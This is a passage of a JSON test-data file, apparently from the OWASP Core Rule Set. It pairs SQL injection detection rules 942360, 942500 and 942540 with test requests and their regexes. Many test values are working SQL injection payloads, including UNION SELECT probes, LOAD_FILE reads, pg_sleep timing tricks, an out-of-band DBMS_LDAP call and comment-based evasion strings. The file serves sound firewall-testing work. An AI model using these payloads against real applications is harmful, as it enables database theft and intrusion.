"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "a=/create" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=/create" } ] }, { "description": "GH issue 1605", "test_id": 16, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "a=/CREATE TABLE Persons" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=/CREATE TABLE Persons" } ] }, { "description": "GH issue 1816", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": " Delete (Trashcan)" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": " Delete (Trashcan)" } ] }, { "description": "GH issue 1816", "test_id": 18, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "5desc" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "5desc" } ] }, { "description": "GH issue 1816", "test_id": 19, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "34-delete" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "34-delete" } ] }, { "description": "GH issue 1816", "test_id": 20, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": " update" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": " update" } ] }, { "description": "GH issue 1816", "test_id": 21, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "/select-quote" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "/select-quote" } ] }, { "description": "GH issue 1816", "test_id": 22, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": " Update: After..." }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": " Update: After..." } ] }, { "description": "GH issue 1816", "test_id": 23, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "\"desc\"" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "\"desc\"" } ] }, { "description": "GH issue 1816", "test_id": 24, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "a=/load.php" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=/load.php" } ] }, { "description": "GH issue 1816", "test_id": 25, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "a=/update-assets" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=/update-assets" } ] }, { "description": "GH issue 1816", "test_id": 26, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "bla blabla live update chart" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "bla blabla live update chart" } ] }, { "description": "GH issue 1816", "test_id": 27, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": ".select-gws-banana" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": ".select-gws-banana" } ] }, { "description": "GH issue 1816", "test_id": 28, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "blablabla. As evidence from the following blablabla" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "blablabla. As evidence from the following blablabla" } ] }, { "description": "GH issue 1816 - Known false positive", "test_id": 29, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" } ] }, { "description": "GH issue 1816 - Known false positive", "test_id": 30, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "'||(select(pg_sleep(15))where(true))||'/investigate" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "'||(select(pg_sleep(15))where(true))||'/investigate" } ] }, { "description": "GH issue 1816 - Known false positive", "test_id": 31, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" }, "expected": { "should_block": false, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" } ] }, { "description": "GH issue 1816", "test_id": 32, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "2020-03-01 UNION ALL SELECT CONCAT" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "2020-03-01 UNION ALL SELECT CONCAT" } ] }, { "description": "GH issue 1816", "test_id": 33, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "x\"; SELECT LOAD_FILE('" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "x\"; SELECT LOAD_FILE('" } ] }, { "description": "GH issue 1816", "test_id": 34, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "-1 UNION SELECT null,123456,null,null,null,null--" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-1 UNION SELECT null,123456,null,null,null,null--" } ] }, { "description": "GH issue 1816", "test_id": 35, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" } ] }, { "description": "GH issue 1816", "test_id": 36, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" } ] }, { "description": "GH issue 1816", "test_id": 37, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" } ] }, { "description": "GH issue 1816", "test_id": 38, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" } ] }, { "description": "GH issue 1816", "test_id": 39, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" }, "expected": { "should_block": true, "rule_ids": [ 942360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 470, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\b(?:(?:alter|(?:(?:cre|trunc|upd)at|renam)e|de(?:lete|sc)|(?:inser|selec)t|load)[\\s\\x0b]+(?:char|group_concat|load_file)\\b[\\s\\x0b]*\\(?|end[\\s\\x0b]*?\\);)|[\\s\\x0b\\(]load_file[\\s\\x0b]*?\\(|[\\\"'`][\\s\\x0b]+regexp[^0-9A-Z_a-z]|[\\\"'0-9A-Z_-z][\\s\\x0b]+as\\b[\\s\\x0b]*[\\\"'0-9A-Z_-z]+[\\s\\x0b]*\\bfrom|^[^A-Z_a-z]+[\\s\\x0b]*?(?:(?:(?:(?:cre|trunc)at|renam)e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)[\\s\\x0b]+[0-9A-Z_a-z]+|u(?:pdate[\\s\\x0b]+[0-9A-Z_a-z]+|nion[\\s\\x0b]*(?:all|(?:sele|distin)ct)\\b)|alter[\\s\\x0b]*(?:a(?:(?:ggregat|pplication[\\s\\x0b]*rol)e|s(?:sembl|ymmetric[\\s\\x0b]*ke)y|u(?:dit|thorization)|vailability[\\s\\x0b]*group)|b(?:roker[\\s\\x0b]*priority|ufferpool)|c(?:ertificate|luster|o(?:l(?:latio|um)|nversio)n|r(?:edential|yptographic[\\s\\x0b]*provider))|d(?:atabase|efault|i(?:mension|skgroup)|omain)|e(?:(?:ndpoi|ve)nt|xte(?:nsion|rnal))|f(?:lashback|oreign|u(?:lltext|nction))|hi(?:erarchy|stogram)|group|in(?:dex(?:type)?|memory|stance)|java|l(?:a(?:ngua|r)ge|ibrary|o(?:ckdown|g(?:file[\\s\\x0b]*group|in)))|m(?:a(?:s(?:k|ter[\\s\\x0b]*key)|terialized)|e(?:ssage[\\s\\x0b]*type|thod)|odule)|(?:nicknam|queu)e|o(?:perator|utline)|p(?:a(?:ckage|rtition)|ermission|ro(?:cedur|fil)e)|r(?:e(?:mot|sourc)e|o(?:l(?:e|lback)|ute))|s(?:chema|e(?:arch|curity|rv(?:er|ice)|quence|ssion)|y(?:mmetric[\\s\\x0b]*key|nonym)|togroup)|t(?:able(?:space)?|ext|hreshold|r(?:igger|usted)|ype)|us(?:age|er)|view|w(?:ork(?:load)?|rapper)|x(?:ml[\\s\\x0b]*schema|srobject))\\b)", "actions": [ { "act_name": "id", "lineno": 471, "act_quote": "no_quote", "act_arg": "942360", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 472, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 473, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 474, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 475, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 475, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 476, "act_quote": "quotes", "act_arg": "Detects concatenated basic SQL injection and SQLLFI attempts", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 477, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 478, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 479, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 480, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 481, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 482, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 483, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 484, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 485, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 486, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 487, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 488, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 489, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 470 } }, { "rule_id": "942500", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)/\\*[\\s\\x0b]*?[!\\+](?:[\\s\\x0b\\(\\)\\-0-9=A-Z_a-z]+)?\\*/", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "MySQL in-line comment detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Use of portability comment (/*!...*/) as evasion technique", "test_id": 1, "request": { "method": "GET", "uri": "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942500 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" } ] }, { "description": "Use of portability comment (/*!...*/) as evasion technique, with space before !", "test_id": 2, "request": { "method": "GET", "uri": "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942500 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" } ] }, { "description": "Use of optimizer hints (/*+...*/) as evasion technique", "test_id": 3, "request": { "method": "GET", "uri": "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942500 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" } ] }, { "description": "Use of optimizer hints (/*+...*/) as evasion technique with space before +", "test_id": 4, "request": { "method": "GET", "uri": "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942500 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" } ] }, { "description": "Status Page Test - MySQL inline comment detected", "test_id": 5, "request": { "method": "GET", "uri": "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942500 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=9999+or+{if+length((/*!5000select+username/*!comment*/" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 511, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)/\\*[\\s\\x0b]*?[!\\+](?:[\\s\\x0b\\(\\)\\-0-9=A-Z_a-z]+)?\\*/", "actions": [ { "act_name": "id", "lineno": 512, "act_quote": "no_quote", "act_arg": "942500", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 513, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 514, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 515, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 516, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 516, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 517, "act_quote": "quotes", "act_arg": "MySQL in-line comment detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 518, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 519, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 520, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 521, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 522, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 523, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 524, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 525, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 526, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 527, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 528, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "multiMatch", "lineno": 529, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 530, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 531, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 511 } }, { "rule_id": "942540", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "^(?:[^']*'|[^\\\"]*\\\"|[^`]*`)[\\s\\x0b]*;", "negated": false } }, "transformations": [ "none", "urlDecodeUni", "replaceComments" ], "metadata": { "phase": "2", "message": "SQL Authentication bypass (split query)", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "paranoia-level/1", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Positive test for single quotes", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=admin%40juice-sh.op';" }, "expected": { "should_block": true, "rule_ids": [ 942540 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=admin%40juice-sh.op';" } ] }, { "description": "Positive test for double quotes", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=admin%40juice-sh.op\";" }, "expected": { "should_block": true, "rule_ids": [ 942540 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=admin%40juice-sh.op\";" } ] }, { "description": "Positive test for backticks", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=admin%40juice-sh.op`;" }, "expected": { "should_block": true, "rule_ids": [ 942540 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=admin%40juice-sh.op`;" } ] }, { "description": "False positive test CSV balanced single quotes", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email='foo';'bar';'def'" }, "expected": { "should_block": false, "rule_ids": [ 942540 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email='foo';'bar';'def'" } ] }, { "description": "False positive test balanced backticks", "test_id": 5, "request": { 